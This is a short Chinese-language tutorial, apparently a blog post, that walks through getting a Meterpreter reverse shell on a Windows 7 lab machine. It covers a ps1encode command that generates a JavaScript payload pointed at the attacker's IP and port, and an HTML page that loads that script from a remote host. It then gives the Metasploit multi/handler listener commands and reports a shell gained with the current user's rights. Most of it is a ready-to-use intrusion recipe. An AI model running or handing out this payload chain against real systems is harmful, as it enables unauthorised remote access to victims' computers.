利用js文件反弹shell
·
1.环境
攻击机:Kali 192.168.42.138
靶机:Win7 192.168.42.139
2.安装工具ps1encode
下载地址:https://github.com/CroweCybersecurity/ps1encode
git clone https://github.com/CroweCybersecurity/ps1encode.git

3. 利用js文件反弹shell
先利用ps1encode生成js payload
./ps1encode.rb --LHOST 192.168.42.138 --LPORT 1919 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

将payload复制到文件1.js中,直接执行js文件的话可能比较明显,所以写了一个1.html文件去远程调用js文件执行。
1.html文件内容如下:
<html>
<body>
<img src='http://192.168.42.1/1.jpg'>
<script src='http://192.168.42.1/1.js'></script>
</body>
</html>
PS:需要将1.js和1.jsp文件放在同一目录下,开启http服务
Kali开启监听(利用msf监听模块):
msfconsole
msf6 > use /exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.42.138
msf6 exploit(multi/handler) > set lport 1919
msf6 exploit(multi/handler) >run

PS:由于在生成js payload时使用了windows/meterpreter/reverse_tcp模块,因此在设置监听时也需要设置该模块。
将1.html文件复制到靶机,使用ie浏览器打开
选择允许阻止的内容->你想允许这种交互吗(是)


查看靶机,获取shell成功,权限为当前用户权限

新一代开源开发者平台 GitCode,通过集成代码托管服务、代码仓库以及可信赖的开源组件库,让开发者可以在云端进行代码托管和开发。旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。
更多推荐


所有评论(0)